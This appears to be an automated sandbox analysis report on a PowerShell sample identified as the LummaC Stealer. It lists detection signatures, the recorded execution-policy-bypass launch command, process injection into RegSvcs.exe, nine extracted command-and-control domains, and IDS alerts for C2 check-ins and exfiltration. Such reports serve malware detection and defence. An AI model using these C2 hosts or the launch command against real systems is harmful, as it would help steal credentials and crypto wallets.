Create Interactive Tour

Windows Analysis Report
176.113.115.225.ps1

Overview

General Information

Sample name:176.113.115.225.ps1
Analysis ID:1600469
MD5:eaf7ebe973ee32e26027ba74eb211b0c
SHA1:29f2261e2a37e97045d000cc1bd0fb614cff9f74
SHA256:97a191d90077f093ce6e0d472167b36bb648de846098ed494d981c1076d358f5
Tags:176-113-115-225bookingps1spam-itauser-JAMESWT_MHT
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • powershell.exe (PID: 7816 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115.225.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 8024 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • wermgr.exe (PID: 8040 cmdline: "C:\Windows\system32\wermgr.exe" "-outproc" "0" "7816" "2580" "2544" "1988" "0" "0" "2592" "0" "0" "0" "0" "0" MD5: 74A0194782E039ACE1F7349544DC1CF4)
  • cleanup
{
  "C2 url": [
    "pleasedcfrown.biz",
    "affordtempyo.biz",
    "mixedrecipew.biz",
    "hoursuhouy.biz",
    "suggestyuoz.biz",
    "lightdeerysua.biz",
    "toppyneedus.biz",
    "impolitewearr.biz",
    "grapeprivatter.cyou"
  ]
}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115.225.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115.225.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115.225.ps1", ProcessId: 7816, ProcessName: powershell.exe
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115.225.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115.225.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115.225.ps1", ProcessId: 7816, ProcessName: powershell.exe
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-27T15:58:21.067993+010020283713Unknown Traffic192.168.2.749743104.21.29.142443TCP
      2025-01-27T15:58:22.192148+010020283713Unknown Traffic192.168.2.749751104.21.29.142443TCP
      2025-01-27T15:58:23.347094+010020283713Unknown Traffic192.168.2.749759104.21.29.142443TCP
      2025-01-27T15:58:24.600432+010020283713Unknown Traffic192.168.2.749771104.21.29.142443TCP
      2025-01-27T15:58:26.035507+010020283713Unknown Traffic192.168.2.749782104.21.29.142443TCP
      2025-01-27T15:58:27.552936+010020283713Unknown Traffic192.168.2.749791104.21.29.142443TCP
      2025-01-27T15:58:29.081608+010020283713Unknown Traffic192.168.2.749802104.21.29.142443TCP
      2025-01-27T15:58:33.152602+010020283713Unknown Traffic192.168.2.749826104.21.29.142443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-27T15:58:21.593553+010020546531A Network Trojan was detected192.168.2.749743104.21.29.142443TCP
      2025-01-27T15:58:22.688671+010020546531A Network Trojan was detected192.168.2.749751104.21.29.142443TCP
      2025-01-27T15:58:33.908893+010020546531A Network Trojan was detected192.168.2.749826104.21.29.142443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-27T15:58:21.593553+010020498361A Network Trojan was detected192.168.2.749743104.21.29.142443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-27T15:58:22.688671+010020498121A Network Trojan was detected192.168.2.749751104.21.29.142443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-27T15:58:21.067993+010020594241Domain Observed Used for C2 Detected192.168.2.749743104.21.29.142443TCP
      2025-01-27T15:58:22.192148+010020594241Domain Observed Used for C2 Detected192.168.2.749751104.21.29.142443TCP
      2025-01-27T15:58:23.347094+010020594241Domain Observed Used for C2 Detected192.168.2.749759104.21.29.142443TCP
      2025-01-27T15:58:24.600432+010020594241Domain Observed Used for C2 Detected192.168.2.749771104.21.29.142443TCP
      2025-01-27T15:58:26.035507+010020594241Domain Observed Used for C2 Detected192.168.2.749782104.21.29.142443TCP
      2025-01-27T15:58:27.552936+010020594241Domain Observed Used for C2 Detected192.168.2.749791104.21.29.142443TCP
      2025-01-27T15:58:29.081608+010020594241Domain Observed Used for C2 Detected192.168.2.749802104.21.29.142443TCP
      2025-01-27T15:58:33.152602+010020594241Domain Observed Used for C2 Detected192.168.2.749826104.21.29.142443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-27T15:58:20.506711+010020594211Domain Observed Used for C2 Detected192.168.2.7619991.1.1.153UDP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-27T15:58:20.519335+010020594231Domain Observed Used for C2 Detected192.168.2.7611681.1.1.153UDP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-27T15:58:24.082393+010020480941Malware Command and Control Activity Detected192.168.2.749759104.21.29.142443TCP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: https://toppyneedus.biz/itAvira URL Cloud: Label: malware
      Source: toppyneedus.bizAvira URL Cloud: Label: malware
      Source: https://toppyneedus.biz/NAvira URL Cloud: Label: malware
      Source: https://toppyneedus.biz/apizAvira URL Cloud: Label: malware
      Source: suggestyuoz.bizAvira URL Cloud: Label: malware
      Source: grapeprivatter.cyouAvira URL Cloud: Label: malware
      Source: pleasedcfrown.bizAvira URL Cloud: Label: malware
      Source: lightdeerysua.bizAvira URL Cloud: Label: malware
      Source: affordtempyo.bizAvira URL Cloud: Label: malware
      Source: hoursuhouy.bizAvira URL Cloud: Label: malware
      Source: impolitewearr.bizAvira URL Cloud: Label: malware
      Source: mixedrecipew.bizAvira URL Cloud: Label: malware
      Source: https://toppyneedus.biz/apieBAvira URL Cloud: Label: malware
      Source: 3.2.RegSvcs.exe.400000.0.raw.unpackMalware Configuration Extractor: LummaC {"C2 url": ["pleasedcfrown.biz", "affordtempyo.biz", "mixedrecipew.biz", "hoursuhouy.biz", "suggestyuoz.biz", "lightdeerysua.biz", "toppyneedus.biz", "impolitewearr.biz", "grapeprivatter.cyou"]}
      Source: 176.113.115.225.ps1Virustotal: Detection: 11%Perma Link
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.1% probability
      Source: 3.2.RegSvcs.exe.400000.0.raw.unpackString decryptor: pleasedcfrown.biz
      Source: 3.2.RegSvcs.exe.400000.0.raw.unpackString decryptor: affordtempyo.biz
      Source: 3.2.RegSvcs.exe.400000.0.raw.unpackString decryptor: mixedrecipew.biz
      Source: 3.2.RegSvcs.exe.400000.0.raw.unpackString decryptor: hoursuhouy.biz
      Source: 3.2.RegSvcs.exe.400000.0.raw.unpackString decryptor: suggestyuoz.biz
      Source: 3.2.RegSvcs.exe.400000.0.raw.unpackString decryptor: lightdeerysua.biz
      Source: 3.2.RegSvcs.exe.400000.0.raw.unpackString decryptor: toppyneedus.biz
      Source: 3.2.RegSvcs.exe.400000.0.raw.unpackString decryptor: impolitewearr.biz
      Source: 3.2.RegSvcs.exe.400000.0.raw.unpackString decryptor: grapeprivatter.cyou
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0041E081 CryptUnprotectData,3_2_0041E081
      Source: unknownHTTPS traffic detected: 104.21.29.142:443 -> 192.168.2.7:49743 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.29.142:443 -> 192.168.2.7:49751 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.29.142:443 -> 192.168.2.7:49759 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.29.142:443 -> 192.168.2.7:49771 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.29.142:443 -> 192.168.2.7:49782 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.29.142:443 -> 192.168.2.7:49791 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.29.142:443 -> 192.168.2.7:49802 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.29.142:443 -> 192.168.2.7:49826 version: TLS 1.2
      Source: Binary string: #.dll.pdb source: powershell.exe, 00000000.00000002.1878353723.00000219B0558000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1915035763.00000219C78C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000000.00000002.1878353723.00000219AF5A7000.00000004.00000800.00020000.00000000.sdmp
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then lea ecx, dword ptr [edx+014B0E26h]3_2_004100EC
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov esi, ecx3_2_0040CA90
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx+6089C535h]3_2_00445B30
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], C8B478E8h3_2_0042CBE0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+00000094h]3_2_0043EC10
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx+7FC08F55h]3_2_0043EC10
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov eax, edx3_2_00429F42
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov edx, ecx3_2_0040CF60
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov byte ptr [edi], dl3_2_00412762
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+000001E3h]3_2_00412762
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov word ptr [edx], ax3_2_0040F717
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx eax, byte ptr [esp+edx+69FE9BD2h]3_2_00443F26
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], CD5A394Bh3_2_004467E0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], CD5A394Bh3_2_004467E0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov ecx, eax3_2_00419000
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then cmp dword ptr [eax+edx*8], E40A7173h3_2_00419000
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov ecx, eax3_2_00419000
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+00000086h]3_2_0042D020
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+310813C5h]3_2_0042E03E
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp ecx3_2_004450C0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp ecx3_2_004450D9
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp ecx3_2_004450DB
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+00000086h]3_2_0042D14A
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+02h]3_2_00427150
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], DC6B6BB0h3_2_0041C955
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then cmp dword ptr [ecx+esi*8], DC6B6BB0h3_2_0041C955
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]3_2_00430930
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then cmp dword ptr [edx+esi*8], C8B478E8h3_2_0043F9C0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then cmp word ptr [ecx+edi+02h], 0000h3_2_0043F9C0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then push eax3_2_0043F9C0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov eax, dword ptr [00457FFCh]3_2_004441FF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov word ptr [eax], cx3_2_0042FA03
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], C6BF57D2h3_2_00442200
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movsx ebp, byte ptr [esi+ecx]3_2_00444A31
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov word ptr [eax], cx3_2_0040DAC0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov ecx, eax3_2_0042AAC2
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov byte ptr [edi], cl3_2_0043428A
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov byte ptr [edx], al3_2_00420289
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov ecx, eax3_2_0042AA89
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]3_2_0040A360
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]3_2_0040A360
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx edx, byte ptr [eax+ecx]3_2_0040E360
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov byte ptr [edi], bl3_2_00433B7D
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp ecx3_2_00445310
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov byte ptr [edi], cl3_2_004343D8
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h3_2_00431BE0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov byte ptr [edi], cl3_2_004343EF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov byte ptr [edi], cl3_2_00434393
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-41704336h]3_2_004433A1
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [esp+02h], 02CE9287h3_2_004433A1
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-41704336h]3_2_004433A1
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp ecx3_2_004453B0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax+00000218h]3_2_00411BBF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h3_2_00419C65
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx+4Ch]3_2_00426C20
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov ecx, eax3_2_0040DD4A
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ecx, byte ptr [ebx+eax]3_2_0040EDC8
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ebx, byte ptr [eax+esi]3_2_004105D0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov word ptr [eax], cx3_2_0042F59D
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ebx, byte ptr [edx]3_2_0043BDB0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+02h]3_2_00443634
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+02h]3_2_00443634
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ebp, byte ptr [esp+ecx+0Ah]3_2_00420EC3
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov word ptr [eax], cx3_2_00420EC3
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx edi, byte ptr [esp+ebx-4078D9EFh]3_2_004206EB
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then cmp word ptr [ecx+edi+02h], 0000h3_2_0042EE95
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]3_2_00418F40
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov edx, ecx3_2_00421748
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov word ptr [ecx], bx3_2_00421748
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 2C331E1Fh3_2_0041BF76
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov edx, ecx3_2_0041BF76
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov edx, ecx3_2_0041BF76
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [esp+04h], eax3_2_0041BF76
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 2C1F0655h3_2_00442710
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov edx, ecx3_2_00421735
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov word ptr [ecx], bx3_2_00421735
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then push esi3_2_00425FF3
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov edx, ecx3_2_00444F80
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx eax, byte ptr [esi+ecx-7E37731Ah]3_2_0040EF95
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov eax, ecx3_2_0041D797
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then cmp word ptr [edx+ecx+02h], 0000h3_2_0041D797
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov ecx, eax3_2_0041FFA1
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp ecx3_2_00444FB0

      Networking

      barindex
      Source: Network trafficSuricata IDS: 2059424 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) : 192.168.2.7:49751 -> 104.21.29.142:443
      Source: Network trafficSuricata IDS: 2059424 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) : 192.168.2.7:49759 -> 104.21.29.142:443
      Source: Network trafficSuricata IDS: 2059424 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) : 192.168.2.7:49743 -> 104.21.29.142:443
      Source: Network trafficSuricata IDS: 2059421 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (impolitewearr .biz) : 192.168.2.7:61999 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2059423 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (toppyneedus .biz) : 192.168.2.7:61168 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2059424 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) : 192.168.2.7:49771 -> 104.21.29.142:443
      Source: Network trafficSuricata IDS: 2059424 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) : 192.168.2.7:49791 -> 104.21.29.142:443
      Source: Network trafficSuricata IDS: 2059424 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) : 192.168.2.7:49782 -> 104.21.29.142:443
      Source: Network trafficSuricata IDS: 2059424 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) : 192.168.2.7:49826 -> 104.21.29.142:443
      Source: Network trafficSuricata IDS: 2059424 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) : 192.168.2.7:49802 -> 104.21.29.142:443
      Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:49751 -> 104.21.29.142:443
      Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.7:49759 -> 104.21.29.142:443
      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49751 -> 104.21.29.142:443
      Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49743 -> 104.21.29.142:443
      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49743 -> 104.21.29.142:443
      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49826 -> 104.21.29.142:443
      Source: Malware configuration extractorURLs: pleasedcfrown.biz
      Source: Malware configuration extractorURLs: affordtempyo.biz
      Source: Malware configuration extractorURLs: mixedrecipew.biz
      Source: Malware configuration extractorURLs: hoursuhouy.biz
      Source: Malware configuration extractorURLs: suggestyuoz.biz
      Source: Malware configuration extractorURLs: lightdeerysua.biz
      Source: Malware configuration extractorURLs: toppyneedus.biz
      Source: Malware configuration extractorURLs: impolitewearr.biz
      Source: Malware configuration extractorURLs: grapeprivatter.cyou
      Source: Joe Sandbox ViewIP Address: 104.21.29.142 104.21.29.142
      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49751 -> 104.21.29.142:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49759 -> 104.21.29.142:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49743 -> 104.21.29.142:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49771 -> 104.21.29.142:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49791 -> 104.21.29.142:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49782 -> 104.21.29.142:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49826 -> 104.21.29.142:443
